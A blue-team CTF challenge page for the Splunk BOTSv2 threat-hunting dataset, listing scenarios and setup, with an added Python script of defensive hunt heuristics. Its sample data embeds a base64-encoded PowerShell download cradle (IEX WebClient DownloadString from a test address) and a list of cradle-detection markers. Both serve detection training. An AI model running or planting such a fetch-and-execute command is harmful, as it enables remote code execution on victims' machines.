Boss of the SOC v2 blue team CTF
Category : Threat Hunting
Questions:
- Weight : 50 | Solved : 1638
- Weight : 100 | Solved : 1078
- Weight : 100 | Solved : 1059
- Weight : 100 | Solved : 1038
- Weight : 500 | Solved : 971
- Weight : 500 | Solved : 985
- Weight : 100 | Solved : 996
- Weight : 500 | Solved : 985
- Weight : 100 | Solved : 924
- Weight : 1000 | Solved : 749
- Weight : 1500 | Solved : 491
- Weight : 500 | Solved : 618
- Weight : 100 | Solved : 661
- Weight : 1000 | Solved : 588
- Weight : 500 | Solved : 607
- Weight : 100 | Solved : 608
- Weight : 250 | Solved : 502
- Weight : 500 | Solved : 453
- Weight : 500 | Solved : 482
- Weight : 250 | Solved : 322
- Weight : 250 | Solved : 430
- Weight : 250 | Solved : 424
- Weight : 100 | Solved : 442
- Weight : 100 | Solved : 408
- Weight : 100 | Solved : 299
- Weight : 100 | Solved : 333
- Weight : 500 | Solved : 331
- Weight : 500 | Solved : 331
- Weight : 500 | Solved : 311
- Weight : 500 | Solved : 283
- Weight : 500 | Solved : 258
- Weight : 500 | Solved : 134
- Weight : 500 | Solved : 251
- Weight : 100 | Solved : 248
- Weight : 1000 | Solved : 244
- Weight : 100 | Solved : 252
Instructions:
- VirtualBox: unzip the VM (password: cyberdefenders.org), start the VM, and access Splunk from the host machine at http://127.0.0.1:8000
- VMware: log in to the VM as vagrant/vagrant, obtain the VM's IP address with the "ip address" command, and access Splunk from the host machine at http://x.x.x.x:8000 using the address assigned to the VM
- Challenge Files:
  - bots2.ova (Memory: 4 GB, CPU: 2 cores, Disk: 17.5 GB).
APT Scenarios:
In this hands-on exercise, you assume the persona of Alice Bluebird, the SOC analyst who successfully assisted Wayne Enterprises and was recommended to Grace Hoppy at Frothly to assist them with their recent issues.
Hunting Scenarios:
- PowerShell: Adversaries will use PowerShell Empire to establish a foothold and carry out attacks.
- Exfiltration Over Alternative Protocol - FTP: Data exfiltration may occur over common network protocols, in this case FTP
- Exfiltration Over Alternative Protocol - DNS: Data Exfiltration may occur using common network protocols, specifically DNS
- Adversary Infrastructure: The adversary has established multiple components of infrastructure beyond what we have already uncovered.
- Spearphishing Attachment: Adversaries will attempt to establish a foothold within Froth.ly using Phishing.
- User Execution: Adversaries will attempt to establish a foothold within Froth.ly by enticing a user to execute an action on a file.
- Persistence - Create Account: An adversary will look to maintain persistence across an enterprise by creating user accounts.
- Persistence - Scheduled Task: An adversary will look to maintain persistence across reboots by using a task scheduler.
- Indicator Removal On Host: Clearing of audit / event logs could indicate an adversary attempting to cover their tracks.
- Reconnaissance: User-Agent strings may provide insight into an adversary that they did not intend to reveal.
- OSINT: Identifying publicly available company information and who is accessing it may provide insight into the adversary.
- Lateral Movement: Adversaries will look to move laterally to other systems using Windows Management Instrumentation (WMI).
- Data Staging: Adversaries will stage data prior to exfiltration, both to make it easier to extract at a time of their choosing and to have a central location for information as it is collected.
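Several of the hunts above reduce to the same mechanical checks once the events are in front of you: long, high-entropy leftmost labels repeated against one registered domain (DNS exfiltration), a PowerShell process whose -EncodedCommand decodes to a download cradle (Empire-style foothold), a process whose parent is WmiPrvSE.exe (WMI lateral movement), and Windows Security event IDs 4720, 4698 and 1102 (account created, scheduled task created, audit log cleared). The script below is an added example written for this page; it is not code from CyberDefenders or from the Splunk BOTSv2 authors and it does not query Splunk. It runs the checks over constructed event dicts whose field names mimic what Splunk extracts from Sysmon, Windows Security and DNS records; the hostnames, domains, sourcetype labels, thresholds and the cradle-marker list are assumptions, not signatures from the dataset.

```python
"""Hunt heuristics over constructed endpoint and DNS events.

Added example for this page: not code from CyberDefenders or the Splunk
BOTSv2 authors, and it does not query Splunk. The event dicts mimic the
field names Splunk would extract from Sysmon, Windows Security and DNS
records; hosts, domains, thresholds and sourcetype labels are assumptions.
"""
import base64
import hashlib
import math
import re
from collections import defaultdict


# --- Exfiltration Over Alternative Protocol - DNS --------------------------
def shannon_entropy(s):
    """Bits of entropy per character; random base16/base32 labels score high."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def registered_domain(fqdn):
    """Naive registered domain (last two labels); enough for this demo."""
    return ".".join(fqdn.rstrip(".").split(".")[-2:])


def hunt_dns_exfil(dns_events, min_label_len=40, min_entropy=3.0, min_unique=3):
    """Map registered domain -> number of distinct long, high-entropy
    subdomains queried under it; only domains over min_unique are returned."""
    seen = defaultdict(set)
    for ev in dns_events:
        q = ev["query"].rstrip(".")
        rd = registered_domain(q)
        if not q.endswith("." + rd):
            continue
        sub = q[: -len(rd) - 1]          # everything left of the registered domain
        first = sub.split(".")[0]        # leftmost label carries the encoded chunk
        if len(first) >= min_label_len and shannon_entropy(first) >= min_entropy:
            seen[rd].add(sub)
    return {d: len(s) for d, s in seen.items() if len(s) >= min_unique}


# --- PowerShell, WMI lateral movement, account / task / log-clear events ----
ENCODED_CMD_RE = re.compile(r"(?i)[-/]e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)")
# Heuristic download-cradle markers (assumed), not a signature for any framework.
CRADLE_MARKERS = ("iex", "invoke-expression", "webclient", "downloadstring")
SECURITY_EVENTS = {  # Windows Security log event IDs
    "4720": "Persistence - Create Account: a user account was created",
    "4698": "Persistence - Scheduled Task: a scheduled task was created",
    "1102": "Indicator Removal On Host: the audit log was cleared",
}


def decode_encoded_powershell(cmdline):
    """Decode a -EncodedCommand payload (base64 of UTF-16LE) or return None."""
    m = ENCODED_CMD_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def hunt_endpoint(events):
    """Return (host, finding) pairs for the endpoint scenarios on the page."""
    findings = []
    for ev in events:
        code = str(ev.get("EventCode"))
        if ev.get("sourcetype") == "WinEventLog:Security" and code in SECURITY_EVENTS:
            findings.append((ev["host"], SECURITY_EVENTS[code]))
        elif ev.get("sourcetype") == "sysmon" and code == "1":   # process create
            decoded = decode_encoded_powershell(ev.get("CommandLine", ""))
            if decoded and any(mk in decoded.lower() for mk in CRADLE_MARKERS):
                findings.append((ev["host"], "PowerShell: encoded command with download cradle"))
            if ev.get("ParentImage", "").lower().endswith("wmiprvse.exe"):
                findings.append((ev["host"], "Lateral Movement: process spawned via WMI (WmiPrvSE.exe)"))
    return findings


# --- Constructed sample data (invented hosts/domains, TEST-NET address) ------
ENCODED = base64.b64encode(
    "IEX (New-Object System.Net.WebClient).DownloadString('http://203.0.113.5/a')"
    .encode("utf-16-le")).decode()
SAMPLE_DNS = [{"src": "10.0.0.5", "query": "www.froth.ly"},
              {"src": "10.0.0.5", "query": "mail.froth.ly"}] + [
    {"src": "10.0.0.7",
     "query": hashlib.sha256(f"chunk{i}".encode()).hexdigest() + ".t.example.com"}
    for i in range(4)]
SAMPLE_ENDPOINT = [
    {"host": "wrk-01", "sourcetype": "sysmon", "EventCode": 1,
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": f"powershell -NoP -NonI -W Hidden -Enc {ENCODED}"},
    {"host": "wrk-01", "sourcetype": "sysmon", "EventCode": 1,
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "notepad.exe notes.txt"},
    {"host": "srv-02", "sourcetype": "sysmon", "EventCode": 1,
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe", "CommandLine": "cmd.exe /c whoami"},
    {"host": "srv-02", "sourcetype": "WinEventLog:Security", "EventCode": 4720},
    {"host": "srv-02", "sourcetype": "WinEventLog:Security", "EventCode": 4698},
    {"host": "srv-02", "sourcetype": "WinEventLog:Security", "EventCode": 1102},
    {"host": "srv-02", "sourcetype": "WinEventLog:Security", "EventCode": 4624},
]

if __name__ == "__main__":
    print(hunt_dns_exfil(SAMPLE_DNS))
    for host, finding in hunt_endpoint(SAMPLE_ENDPOINT):
        print(host, finding)
```

The DNS check keys on the leftmost label only, because that is where a chunked exfiltration tool puts the payload; counting distinct subdomains per registered domain (rather than per query) keeps a single odd-looking CDN hostname from tripping the hunt. The encoded-command decoder tolerates the short flag forms (-e, -ec, -enc) that Empire-style launchers use, and treats any undecodable payload as "not encoded PowerShell" rather than raising, so one malformed event does not abort a sweep over the whole index.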
The data included in this app was generated in August 2017 by members of Splunk's Security Specialist team: Dave Herrald, Ryan Kovar, Steve Brant, Jim Apger, John Stoner, Ken Westin, David Veuve and James Brodsky. They stood up a few lab environments connected to the Internet. Within the environment they had a few Windows endpoints instrumented with the Splunk Universal Forwarder and Splunk Stream. The forwarders were configured with best practices for Windows endpoint monitoring, including a full Microsoft Sysmon deployment and best practices for Windows event logging. The environment included a Palo Alto Networks next-generation firewall to capture traffic and provide web proxy services, and Suricata to provide network-based IDS. This resulted in the dataset used in this challenge.
If you would like to learn more about Hunting with Splunk, here are some handy resources that you can check out:
SHA1SUM: 2bc6bb7a92ed7341f8a4c61c456dd7b53f9be990
Password: cyberdefenders.org
Size: 12 GiB
Published: Aug. 4, 2020